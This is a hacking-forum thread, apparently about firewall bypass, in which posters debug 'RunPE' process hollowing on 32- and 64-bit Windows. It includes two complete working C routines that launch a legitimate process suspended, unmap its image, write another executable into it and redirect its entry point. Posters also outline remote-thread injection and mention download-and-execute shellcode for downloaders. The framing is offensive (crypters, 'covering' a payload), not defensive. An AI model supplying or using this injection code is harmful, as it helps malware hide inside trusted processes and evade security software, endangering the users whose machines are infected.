Thread: [REQ] FWB++

SqUeEzEr
I'm using well known method by cryptic3, don't have idea why it fails.
Joefish
DEP is set by default, code section has CODE|EXECUTE|READ access. Should I change it with PAGE_EXECUTE_READWRITE option ?
AFAIK, when copying full image to another process memory, it sets up it by default. (When creating process with CREATE_SUSPENDED flag)
--
edit: I'm allocating space with VirtualAllocEx into remote process's memory with PAGE_EXECUTE_READWRITE, don't know how to change in other way. Anyone, got working example here ? Gonna study on it. Thank you. ;-)

cryptic 3, runPE failing injection of x86 PE into x86 process. in windows 7 64bit
and when running in windows xp,vista,win7 x86 its working.
i dont get it.
@joefish: why would you need to imbed a PE or a dll into foreign process for a downloader? i mean a small download and exec shellcode will do fine.

for me, it doesn't even work in any version of windows. (xp/vista/7) it still fails when trying to inject into some microsoft based application.

i lost the original code you sent me before, post that again.
i think cryptic3 didnt virtual protect in sections.

Originally Posted by The Executer

cryptic 3, runPE failing injection of x86 PE into x86 process. in windows 7 64bit
and when running in windows xp,vista,win7 x86 its working.
i dont get it.
@joefish: why would you need to imbed a PE or a dll into foreign process for a downloader? i mean a small download and exec shellcode will do fine.

He didn't specify which language he'd be using, so for all I know he might be using vb (and there is no way he'll be able to inject a remote thread with that, unless he does use actual shellcode).

I didn't invent those FWB#++ things, they were just terms I had come across a long time ago.

Just so you know what has to be done in the RunPE:
NtUnmapViewOfSection <-- Get the remote processes imagebase from its PEB, then unmap it if it is the same as the one you are injecting (you could just unmap it no matter what I guess, I don't see why not)
VirtualAllocEx <-- Allocate space in the remote process at your injected PE's imagebase size = SizeOfImage - PAGE_READWRITE (no need for anything to be executable just yet)
...write the headers to the remote process...
WriteProcessMemory <-- Loop through the sections and write them to the remote process... if this succeeds then
VirtualProtectEx <-- Set the page protection for that section to correspond to that sections characteristics (.text section will be set to PAGE_EXECUTE_READWRITE, all of that will be taken care of automatically if you parse them correctly)

It wouldn't surprise me if cryptic didn't VirtualProtectEx... most people who use it wouldn't notice.

If you are using C or some shit like that then just inject a thread... you know the drill: OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread.

i know this guy, hes using C

joefish, we know how runPE is done. its just that it wont work on x64 OS while it works fine on x86 OS. and before you ask. i am also injecting x86 into x86
and it wont work for calc & notepad. rest all work fine.
i modified a little bit cryptic3's code for working. only problem is calc.exe isnt injecting into any normal executable i made. while its perfectly getting inside notepad and calc(x86) in x64 environment. rest binaries are working regardless of the shell(covering). only problem is calc.
also i am setting attributes correctly.
LOL i just checked the loadexe 2004 POC by that chinese guy.
it doesnt allow injecting calc.exe into a simple process. in short same problem as me.

Code:

If you are using C or some shit like that then just inject a thread... you know the drill: OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread.

we are talking of PE injection not thread injection.

Look at this code carefully.

Code:

#include <windows.h>
#define ORIGIN_NAME "testapp1.exe"
#define TARGET_NAME "calc.exe"
typedef int (WINAPI*unmap)(HANDLE,PVOID);
int main(int argc, char* argv[])
{
unmap ZwUnmap = (unmap)GetProcAddress(LoadLibrary("ntdll.dll"),"ZwUnmapViewOfSection");
//both are local files, copying first one into the memory buffer.
PROCESS_INFORMATION pi;
HANDLE hFile = CreateFile(ORIGIN_NAME,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL);
int size = GetFileSize(hFile,NULL);
char* hMem = VirtualAlloc(NULL,size,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
LPDWORD rbytes;	
ReadFile(hFile,hMem,size,(LPDWORD)&rbytes,NULL);
CloseHandle(hFile);
//Initializing structures.
PIMAGE_DOS_HEADER pidh;
pidh = (PIMAGE_DOS_HEADER)hMem;
PIMAGE_NT_HEADERS pinh;
pinh = (PIMAGE_NT_HEADERS)&hMem[pidh->e_lfanew];
STARTUPINFO si;
memset(&si,0,sizeof(si));
//Create Process in suspended state.
CreateProcess(TARGET_NAME,NULL,NULL,NULL,1,CREATE_SUSPENDED,NULL,NULL,&si,&pi);
	CONTEXT ctx;
           ctx.ContextFlags = CONTEXT_FULL;
	GetThreadContext(pi.hThread,&ctx);
	ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint;
//Free remote process memory.
//VirtualFreeEx(pi.hProcess,(LPVOID)pinh->OptionalHeader.ImageBase,0,MEM_RELEASE); //I don't see any point using ZwUnmapViewOfSection instead of this.
	DWORD addr;
	ReadProcessMemory(pi.hProcess,(VOID*)(ctx.Ebx+8),&addr,4,NULL);
	ZwUnmap(pi.hProcess,(PVOID)addr); //unmap at remote process ImageBase
	//ZwUnmap(pi.hProcess,(PVOID)pinh->OptionalHeader.ImageBase); //unmap section base address
//Allocate new space into remote process and write DOS+NT headers there.
	VirtualAllocEx(pi.hProcess,(PVOID)pinh->OptionalHeader.ImageBase,pinh->OptionalHeader.SizeOfImage,MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(pi.hProcess,(LPVOID)pinh->OptionalHeader.ImageBase,hMem,pinh->OptionalHeader.SizeOfHeaders,NULL);
//Copy sections at their place into remote process.
int i;
PIMAGE_SECTION_HEADER pish;
	for (i=0;i < pinh->FileHeader.NumberOfSections;i++)
		{
				pish = (PIMAGE_SECTION_HEADER)&hMem[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) *i];
				WriteProcessMemory(pi.hProcess,(LPVOID)(pinh->OptionalHeader.ImageBase + pish->VirtualAddress),&hMem[pish->PointerToRawData],pish->SizeOfRawData,NULL);
		}
	SetThreadContext(pi.hThread,&ctx);
	ResumeThread(pi.hThread); //Go!
return 0;
}

as you can see, I don't need to call VirtualProtectEx, VirtualAllocEx does protection job itself.

Originally Posted by The Executer

joefish, we know how runPE is done. its just that it wont work on x64 OS while it works fine on x86 OS. and before you ask. i am also injecting x86 into x86
and it wont work for calc & notepad. rest all work fine.
i modified a little bit cryptic3's code for working. only problem is calc.exe isnt injecting into any normal executable i made. while its perfectly getting inside notepad and calc(x86) in x64 environment. rest binaries are working regardless of the shell(covering). only problem is calc.
also i am setting attributes correctly.
LOL i just checked the loadexe 2004 POC by that chinese guy.
it doesnt allow injecting calc.exe into a simple process. in short same problem as me.

Code:

If you are using C or some shit like that then just inject a thread... you know the drill: OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread.

we are talking of PE injection not thread injection.

Here are my results:

	Injection on x86	Injection on x64
Injection to self (x86 proggie)	Success	Success
Injection to calc (x86 and x64)	Success	Fail (process created but my code was not executed)
Injection to notepad (x86 and x64)	Success	Fail (process created but my code was not executed)

It doesn't surprise me that I'm not able to inject a 32bit PE into a 64bit PE.

I know you're talking about PE Injection, when you said "why would you need to imbed a PE or a dll into foreign process for a downloader? i mean a small download and exec shellcode will do fine" I elaborated on that point telling people how that would be done

Originally Posted by Overflowz

Look at this code carefully.

Code:

#include <windows.h>
#define ORIGIN_NAME "testapp1.exe"
#define TARGET_NAME "calc.exe"
typedef int (WINAPI*unmap)(HANDLE,PVOID);
int main(int argc, char* argv[])
{
unmap ZwUnmap = (unmap)GetProcAddress(LoadLibrary("ntdll.dll"),"ZwUnmapViewOfSection");
//both are local files, copying first one into the memory buffer.
PROCESS_INFORMATION pi;
HANDLE hFile = CreateFile(ORIGIN_NAME,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL);
int size = GetFileSize(hFile,NULL);
char* hMem = VirtualAlloc(NULL,size,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
LPDWORD rbytes;	
ReadFile(hFile,hMem,size,(LPDWORD)&rbytes,NULL);
CloseHandle(hFile);
//Initializing structures.
PIMAGE_DOS_HEADER pidh;
pidh = (PIMAGE_DOS_HEADER)hMem;
PIMAGE_NT_HEADERS pinh;
pinh = (PIMAGE_NT_HEADERS)&hMem[pidh->e_lfanew];
STARTUPINFO si;
memset(&si,0,sizeof(si));
//Create Process in suspended state.
CreateProcess(TARGET_NAME,NULL,NULL,NULL,1,CREATE_SUSPENDED,NULL,NULL,&si,&pi);
	CONTEXT ctx;
           ctx.ContextFlags = CONTEXT_FULL;
	GetThreadContext(pi.hThread,&ctx);
	ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint;
//Free remote process memory.
//VirtualFreeEx(pi.hProcess,(LPVOID)pinh->OptionalHeader.ImageBase,0,MEM_RELEASE); //I don't see any point using ZwUnmapViewOfSection instead of this.
	DWORD addr;
	ReadProcessMemory(pi.hProcess,(VOID*)(ctx.Ebx+8),&addr,4,NULL);
	ZwUnmap(pi.hProcess,(PVOID)addr); //unmap at remote process ImageBase
	//ZwUnmap(pi.hProcess,(PVOID)pinh->OptionalHeader.ImageBase); //unmap section base address
//Allocate new space into remote process and write DOS+NT headers there.
	VirtualAllocEx(pi.hProcess,(PVOID)pinh->OptionalHeader.ImageBase,pinh->OptionalHeader.SizeOfImage,MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(pi.hProcess,(LPVOID)pinh->OptionalHeader.ImageBase,hMem,pinh->OptionalHeader.SizeOfHeaders,NULL);
//Copy sections at their place into remote process.
int i;
PIMAGE_SECTION_HEADER pish;
	for (i=0;i < pinh->FileHeader.NumberOfSections;i++)
		{
				pish = (PIMAGE_SECTION_HEADER)&hMem[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) *i];
				WriteProcessMemory(pi.hProcess,(LPVOID)(pinh->OptionalHeader.ImageBase + pish->VirtualAddress),&hMem[pish->PointerToRawData],pish->SizeOfRawData,NULL);
		}
	SetThreadContext(pi.hThread,&ctx);
	ResumeThread(pi.hThread); //Go!
return 0;
}

as you can see, I don't need to call VirtualProtectEx, VirtualAllocEx does protection job itself.

Making everything executable shouldn't be the solution. Whether it works or not that is a very "sledgehammer" way of doing this. Sorry if my advice didn't assist you.

below is function.
its doing every thing fine in x86 environment
one example:
injecting calc.exe (x86 PE) into a test application(x86) process. success

but same thing in x64 fails
i.e. injecting calc.exe(x86 PE) into a test application (x86) process. fail in x64 environment

but when injecting calc.exe (x86 PE) into notepad( x86 PE) . success in x64 environment.
basically whenever i choose a shell(covering / hollowed process) of windows prebuilt application it injects calc
but when i choose my own exe it wont work, while same thing regardless of shell/covering works on x86
and its creating problems only for calc

Code:

BOOL memexe(LPVOID pBuffer, LPTSTR szTargetProc, LPTSTR szParameters)
{
	DWORD dwBaseAddr, dwBytes;
	LPVOID pBase;

	DWORD x,i;

	PROCESS_INFORMATION pi;
	STARTUPINFO si;

	CONTEXT Context;

	PIMAGE_NT_HEADERS pNT = NULL;
	PIMAGE_SECTION_HEADER pSections = NULL;

	memset((BYTE*)&si, 0, sizeof(STARTUPINFO));
	memset((BYTE*)&pi, 0, sizeof(PROCESS_INFORMATION));

	si.cb = sizeof(STARTUPINFO);
	si.wShowWindow = 0;
	if (CreateProcess(NULL, szTargetProc, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
	{
		Context.ContextFlags = CONTEXT_INTEGER;

		if (GetThreadContext(pi.hThread, &Context))
		{
			if (ReadProcessMemory(pi.hProcess, (LPCVOID)(Context.Ebx + 8), &dwBaseAddr, sizeof(DWORD), &dwBytes))
			{
				if (NtUnmapViewOfSection(pi.hProcess, (LPVOID)dwBaseAddr) >= 0)
				{
					pNT = (PIMAGE_NT_HEADERS)((char*)pBuffer + ((PIMAGE_DOS_HEADER)pBuffer)->e_lfanew);

					pBase = (LPVOID)VirtualAllocEx(pi.hProcess, (LPVOID)pNT->OptionalHeader.ImageBase, pNT->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

					if (pBase)
					{
						if (WriteProcessMemory(pi.hProcess, pBase, pBuffer, pNT->OptionalHeader.SizeOfHeaders, &dwBytes))
						{
							pSections = (PIMAGE_SECTION_HEADER)((char*)pNT + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER) + pNT->FileHeader.SizeOfOptionalHeader);

							for (i = 0; i < pNT->FileHeader.NumberOfSections; i++)
							{
								
							WriteProcessMemory(pi.hProcess, (LPVOID)((DWORD)pBase + pSections[i].VirtualAddress), (LPVOID)((DWORD)pBuffer + pSections[i].PointerToRawData), pSections[i].SizeOfRawData, &dwBytes);
							VirtualProtectEx(pi.hProcess, (LPVOID)((DWORD)pBase + pSections[i].VirtualAddress), pSections[i].Misc.VirtualSize, Mapping[pSections[i].Characteristics >> 29], &dwBytes);
							}

							if (i == pNT->FileHeader.NumberOfSections && WriteProcessMemory(pi.hProcess, (LPVOID)(Context.Ebx + 8), &pBase, sizeof(LPVOID), &dwBytes))
							{
								Context.Eax = (DWORD)pBase + pNT->OptionalHeader.AddressOfEntryPoint;
								if (SetThreadContext(pi.hThread, &Context) != 0)
								{
									ResumeThread(pi.hThread);
									return TRUE;
								}
							}
						}
					}
				}
			}
		}
		TerminateProcess(pi.hProcess, 0);
	}
	return FALSE;
}